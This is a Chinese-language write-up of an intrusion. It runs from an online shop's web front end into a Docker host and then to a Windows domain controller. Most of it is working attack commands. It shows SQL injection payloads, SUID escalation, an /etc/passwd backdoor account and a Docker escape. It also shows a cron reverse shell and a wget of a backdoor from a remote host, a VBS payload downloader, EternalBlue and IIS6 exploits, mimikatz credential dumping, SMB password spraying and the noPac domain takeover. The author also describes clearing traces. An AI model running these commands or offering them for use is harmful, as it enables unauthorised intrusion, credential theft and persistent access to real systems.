从外网打点到渗透内网域控一条龙

前端渗透

目录读取漏洞

获取域名，使用dirsearch、御剑、进行目录扫描，发现存在robots.txt

访问robots.txt中屏蔽的目录发现存在目录读取漏洞

读取/admin获得后台管理系统地址

http://xxx.xxx.xxx/admin/webadmin.php?mod=do&act=login

在该商城注册一个账号并登录

13377779999 tiancai 123456

进入个人主页，发现一处头像上传，进行测试，不存在文件上传漏洞

测试各处搜索框，均未发现注入漏洞，此时我喝了一杯水，仔细思考

代码审计

按下F12，打开控制台，查看网站文件结构，在其中一个js文件中发现这是一个商城模板，大喜

在网络上成功找到源码，下载开始审计代码

漫长的时间后，不负众望；

SQL注入漏洞

第一个

虽然该项目在执行数据库操作时都会调用一个gpc的函数，但在修改密码处，发送验证码的时候，会记录用户的IP，并写入数据库，此处没有调用gpc函数，存在SQL注入漏洞

该漏洞整个流程是，网站找回密码处->输入账号和验证码->触发SQL注入

payload：

X-Forwarded-For: 111'AND (SELECT 1128 FROM (SELECT(select(sleep(4))))abc)-- aaaaa

第二个

该商城存在手机端页面，在查看订单时，传入 $_REQUEST[‘order_id’] 这里并没有过滤，存在SQL注入
利用火狐浏览器下载 User-Agent Switcher 设置手机模式，登录抓取包使用sqlmap 对其进行注入

随后使用sqlmap成功跑出数据库，获得后台登陆密码

payload：

sqlmap -r sql.txt --dbms mysql --dbs

GET /user.php?mod=back&act=dohuishou&order_id=1 HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:83.0) Gecko/83.0 Firefox/83.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;
q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

但此时我却没有很开心，因为还是没有getshell，没法子，先登录后台进去看看

后续略，最后成功getshell，获得网站服务器普通权限

后端渗透

权限提升

随后我在隐藏处写入shell，把之前留下的后门文件清除，清楚痕迹

蚁剑连接后使用shell，发现其是一个docker容器

判断是不是在docker容器内

ls -alh /.dockerenv

进行提权操作，使用suid提权

find / -perm -u=s -type f 2>/dev/null

使用find

touch test
find test -exec whoami \;

获得root权限，上传msf后门，使用root权限运行，成功上线msf

chmod +x r
find test -exec ./exp \;

msf中为root权限，使用shell，创建root用户，并写入/etc/passwd

openssl passwd -1 -salt qwer 123456

创建交互shell，切换刚刚创建的root用户

python -c 'import pty; pty.spawn("/bin/bash")'
su qwer
Password: 123456

docker逃逸

目前还是处于docker容器内，所以还要进行提权到宿主上

在docker启动时，如果--privileged=true，则可以逃逸

创建目录
mkdir /test
将宿主的目录挂载到test目录
mount /dev/sda1 /test
改变根目录为 /test
chroot /test

权限维持

创建反弹shell，写入计划任务

echo '/bin/bash -i >& bash -i >&/dev/tcp/xxx.xxx.xxx.xxx/8888 0>&1' > /root/sec.sh
echo '*/1 * * * * root bash /root/sec.sh' >>/etc/crontab

随后监听8888端口，获得反弹shell

nc -lvnp 8888

然后下载准备好的msf后门，msf重新启用handler监听，使宿主msf后门上线

wget http://xxx.xxx/exp

此时，获得该网站整个后端服务器权限

内网横向渗透

首先要进行信息收集，特别是ip和端口、主机网络连接等

查看ipconfig，获得内网ip，添加路由

run get_local_subnets
run autoroute -s 192.168.1.0/255.255.255.0
run autoroute -p

在msf中启动socket代理，并设置 kali 的 /etc/proxychains4.conf 文件

使用 proxychains4 调用nmap扫描内网

proxychains4 nmap -sT -Pn 192.168.1.0/24 -p 445,80

如何想要扫描获得的信息更加详细，可以使用fscan扫描内网

下载地址：https://github.com/shadow1ng/fscan

上传fscan后，进行扫描

./fscan_amd64 -h 192.168.1.0/24 -np -no -nopoc

最终扫描结果，另外存在两台主机，一台win7，一台win2003（存在IIS6.0），并且两台主机还存在于另一个网段

永恒之蓝

尝试使用永恒之蓝攻击win7

use windows/smb/ms17_010_eternalblue
set pyaload windows/meterpreter/bind_tcp #选择正向shell
set rhosts 192.168.1.13
run

攻击失败

CVE-2017-7269 iis6.0远程代码执行漏洞

尝试使用CVE-2017-7269攻击win2003

下载地址：https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269

proxychains4 python2 iis6webdav.py 192.168.1.14 80 vpsIP 接收端口

成功反弹shell，普通权限

msf生成win后门，成功上线

注意，windows server 2003 要使用特定的方式下载wenjian

vbs下载后门：

echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs

cscript downfile.vbs http://xxx.xxx/1.exe.rar 1.exe

CVE-2009-1535 IIS6 2003提权

在msf上传CVE-2009-1535exp得到系统权限，再执行msf后门提权到系统权限，得到win2003主机

win2003主机信息收集

使用msf中的kiwi模块获取凭证，hashdump得到administrator的MD5加密密码

使用在线破解MD5网站 www.cmd5.com 破解得到明文密码 admin123

上传nbtscan，进行扫描，得到域内主机信息

C:\aaa>nbtscan -r 10.10.10.0/24
nbtscan -r 10.10.10.0/24
10.10.10.0   Sendto failed: No error
Warning: -r option not supported under Windows. Running without it.
Doing NBT name scan for addresses from 10.10.10.0/24
IP address    NetBIOS Name   Server  User       MAC address   
------------------------------------------------------------------------------
10.10.10.12    WIN2003    <server> <unknown>    xxx
10.10.10.15    WIN7       <server> <unknown>    xxx
10.10.10.160   AD01       <server> <unknown>    xxx
10.10.10.161   AD02       <server> <unknown>    xxx

smb用户批量爆破

把netbios name获得的主机名设置成用户列表，使用smb登录模块进行批量弱口令测试

use scanner/smb/smb_login

[+] 192.168.1.13:445 - 192.168.1.13:445 - Success: '.\WIN7:admin123'

psexec登录获取shell

使用 msf smb/psexec 失败

use exploit/windows/smb/psexec

使用 impacket smbsxec 失败

proxychains4 python smbexec.py WIN7:admin123@10.10.10.15

使用 ms17_010_psexec 成功

use windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set rhosts 10.10.10.15
set smbuser win7
set smbpass admin123
run

成功获得shell，系统权限，拿下win7

win7主机信息收集

使用msf中的kiwi模块

load kiwi
kiwi_cmd sekurlsa::logonPasswords

发现该主机上的域普通用户，域名，账号以及其明文密码

CVE-2021-42278 and CVE-2021-42287 攻击域控

下载地址：https://github.com/Ridter/noPac

proxychains4 python noPac.py xxx.xxx/test:xxx -dc-ip 10.10.10.160 - dc-host AD01 -shell --impersonate administrator
proxychains4 noPac.py xxx.xxx/test:xxx -dc-ip 10.10.10.160 -dc-host AD01 --impersonate administrator -dump

拿下域控，得到所有主机权限

项目总结

1. 要胆大心细，不要怕试错，错的越多，收获越大
2. 实在没思路了不懂就问，就像今年雷总演讲说的那样，你问懂的人会解决%99的问题
3. 要了解最新漏洞以及各种安全资讯，武器越多，底气越大